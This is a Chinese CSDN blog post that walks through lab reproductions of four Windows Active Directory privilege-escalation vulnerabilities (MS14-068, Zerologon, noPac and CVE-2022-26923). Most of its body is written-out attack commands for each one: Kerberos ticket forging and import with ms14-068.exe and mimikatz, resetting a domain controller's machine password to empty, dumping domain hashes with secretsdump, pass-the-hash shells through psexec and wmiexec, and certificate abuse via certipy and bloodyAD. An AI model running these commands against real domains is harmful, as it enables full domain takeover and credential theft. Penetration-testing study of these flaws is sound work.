windows 域控提权CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923

最新推荐文章于 2024-03-27 11:00:00 发布
最新推荐文章于 2024-03-27 11:00:00 发布
阅读量621 收藏 1
点赞数
分类专栏: windows+linux提权 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129370630
版权

一、CVE-2014-6324复现

环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008

工具:ms14-068.exe(漏洞exp)  mimikatz  psexec

利用条件:

1.域用户账号密码

2.获得一台主机权限(本地administrator)

复现:

获取sid号

whoami /user

 获取域控制器地址

net time /domain

 利用exp,生成一个高权限票据:

ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d OWA2010CN-God.god.org

生成的票据

链接域控的c盘,没导入票据之前是失败的

 dir \\OWA2010CN-God.god.org\C$

使用mimikatz导入票据:

kerberos::list               #查看当前会话

 kerberos::pure           #清空会话

kerberos::ptc "TGT_test02@test.lab.ccache"  #导入票据

 dir \\OWA2010CN-God.god.org\C$

  使用psexec返回域控cmd的会话

psexec \\OWA2010CN-God.god.org cmd

 正常来说webadmin域用户是不能登录域控的

 为什么需要获得主机权限:

本地管理员提权成功后,可以导出相应的hash

 域用户提权失败

二、CVE-2020-1472复现

环境:god.org域,两台主机,一台win2008域控,kali2022

工具包:

exp:cve-2020-1472-exploit

impacket-0.10.0

复现:

获取计算机名:

nbtscan -v -h 192.168.3.21

 检测漏洞是否存在:

python zerologon_tester.py OWA2010CN-GOD 192.168.3.21

 重置空密码:

python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

 连接后导出hash:

python secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

 WMI连接反弹:

python wmiexec.py god/administrator@192.168.3.21 -hashes ad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

成功提权为域管理员:

 三、CVE-2021-42287复现

前提:

一个域用户账号和密码

环境:god.org域,两台主机,一台win2008域控,另一台kali

工具:sam-the-admin

下载:https://github.com/WazeHell/sam-the-admin

复现:

python sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

提权成功:

 四、CVE-2022-26923复现

环境:有域 有证书服务器的win2016,kali2022,kali作为攻击机,win2016为域控

利用前提:

1.一个普通域用户账号

2.有证书服务器

环境准备:

需要用到工具包:

Certipy-main  GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

impacket-0.10.0

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

bloodyAD-main

GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework

impacket-0.10.0安装:

pip install impacket -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
pip install .

Certipy-main  安装:

python setup.py install

#网不好时会下载不成功,另一种方法

#将要下载的包写成1.txt

pip install -r 1.txt -i  https://pypi.tuna.tsinghua.edu.cn/simple some-package

检测证书时出现错误:

 将证书服务器密钥加密换成sha-1即可

环境搭建参考链接:

CVE-2022-26923 Windows域提权漏洞 - 爱码网 (likecs.com)

复现:

在win2016新建了一个用户test

用户名:test

密码:Huawei@123

获取CA结构名和计算机名

certutil -config - -ping  

或者:

net time #获取计算机名
certutil -CA#获取证书名

 

 在kali的本地hosts中添加以下内容 

192.168.85.110        l.com

192.168.85.110        WIN-SPGLPTOHACC.l.com

192.168.85.110        l-WIN-SPGLPTOHACC-CA     

 进行联通性测试:

ping l.com

 申请证书

certipy req 'l.com/test:Huawei@123@WIN-SPGLPTOHACC.l.com' -ca l-WIN-SPGLPTOHACC-CA -template User -debug
 

 检测证书

certipy auth -pfx test.pfx

 添加用户:

python bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 addComputer pwnmachine 'CVEPassword1234*'

 设置属性:

python3 bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 setAttribute 'CN=pwnmachine,CN=Computers,DC=l,DC=com' dNSHostName '["WIN-SPGLPTOHACC.l.com"]'

 申请证书:

certipy req 'l.com/pwnmachine$:CVEPassword1234*@192.168.85.110'  -ca l-WIN-SPGLPTOHACC-CA -template Machine -dc-ip 192.168.85.110 

检测证书:

certipy auth -pfx ./win-spglptohacc.pfx -dc-ip 192.168.85.110

获取所有HASH,hash使用的是上方检测证书的hash值:

python secretsdump.py 'l.com/win-spglptohacc$@WIN-SPGLPTOHACC.l.com' -hashes :dd3501bcbf236920c878aeebe2e77a6e

 没有l.com/admininstrator的hash,就用aministrator的hash,利用HASH:

python wmiexec.py l.com/administrator@192.168.85.110 -hashes 53bd0647e27f1474ec38eb7920029d115bfe1f7d1415bb473eb5a99b33bc7b79

成功获取域管理员权限 

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透之MS14-068(CVE-2014-6324)
谢公子的博客
06-24 6153
在做渗透测试时,当我们拿到了一个普通成员的账号后,想继续对该进行渗透,拿到服务器限。如果服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得服务器限。 MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在制器上使用命令检测。 systeminfo |find "3011780" 如下,为空说明该服务...
***之MS14-068
weixin_33728708的博客
01-12 302
0x00 前言 在做***测试时,当遇到环境,获取到一个成员账号后,如果制器未打好补丁,则可以利用本文所到的漏洞,快速获取到制器限。笔者这里总结网上已有资料,加以描述,希望你能在实际测试中派上用场。 0x01 准备工作 成员账号及密码一个 mimikatz ms14-068.exe 03以上服务器或pc 0x02 模拟环境 制器 2008r2 dc.test.co...
10、内网安全-横向移动&&NetLogon&ADCS&PAC&KDC&永恒之蓝
最新发布
xnxqwzy的博客
03-27 854
我个人学习是通过课程和以上文章,漏洞利用的话,基本上就是根据复现文章一步一步实现,对于的漏洞编号还是得记一记,这些常识可能面试会问到,像CVE-2017-0146(ms17-010) 要做到耳熟能详。
CVE-2020-1472()
p01son的博客
08-02 646
CVE-2020-1472() Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472()简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows中严重的远程升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可
nopac
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2532
nopac
CVE-2020-1472
Adminxe的博客
12-29 2336
0x00 测试环境 DC(WIN-ENS2VR5TR3N):192.168.183.130 攻击机器:192.168.183.129 0x01 对进行测试漏洞是否存在 python3 zerologon_tester.py WIN-ENS2VR5TR3N 192.168.183.130 0x02 使用zerologon工具将密码打成空 (这里打空的用户是所在机器的账户,并不是账户。) python3 set_empty_pw DC_NETBIOS_NAME DC_I..
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" 是IIS供的一个特性,供了黑白名单,来限制用户对web资源的访问。由于...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。... 成功攻击此漏洞可能导致Oracle ...
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server升漏洞 和 CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p...
漏洞验证脚本ssl-deacth-alert(cve-2016-8610)
12-14
仅供学习。勿用商业。谢谢合作。漏洞验证脚本ssl-deacth-alert(cve-2016-8610)
CVE截止到2020.4.20号的漏洞
04-20
CVE截止到2020.4.20号的漏洞,整理不易,下载也简单,方便参考学习~~~~~~~~~~~~~~
CVE-2020-1472 利用(
墨痕诉清风的博客
01-25 2305
(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
内网安全——-CVE-2020-1472&NTLM中继攻击
m0_61506558的博客
02-16 458
webserver@ #45mary-pc@#45sqlserver@#45条件:通讯双方当前用户密码一致。受害主机:web页面,出网:互联网站点都可以,不出网:1、没有网络被主机上建立http 2、部分出网,能出http互联网站点都可以,不能出http互联网站点不可以被主机(跳板机)上建立http
用户 MS14-068(CVE-2014-6324)
qq_46635165的博客
11-17 805
环境 & 工具: win2008 -- – 192.168.3.133 win2012 --内主机 – 192.168.3.132 :qf.com 内普通用户:sh 密码:123.com pyKEK工具包下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068 应用环境:已拥有一个内用户的用户名和密码以及该用户的sid,获取了内一台主机的限 1,使用普通用户登录内主机Win2012,
内网安全之:Kerberos 用户漏洞(MS14-068;CVE-2014-6324)
f_carey的博客
12-08 1634
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Kerberos 用户漏洞(MS14-068;CVE-2014-63241 pyKEK 工具包2 MSF 中 ms14_068 利用3 goldenPac.py4 防范 Kerberos MS14-068 漏洞 Microsoft Security Bulletin MS14-068 - Critical.
环境姿势
懂进攻知防守
08-15 1188
Netlogon升2020年08月12日, 微软官方发布了 NetLogon 特升漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与间易受攻击的安全通道时,可利用此漏洞获取管访问限。成功利用此漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
MS14-068 (CVE-2014-6324)用户漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7165
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个内的普通账户可以利用此漏洞进行升,升级为管理员限。 二、漏洞原理 Kerberos认证原理:http
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞在Jenkins服务器上执行任意代码,甚至获取管理员限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值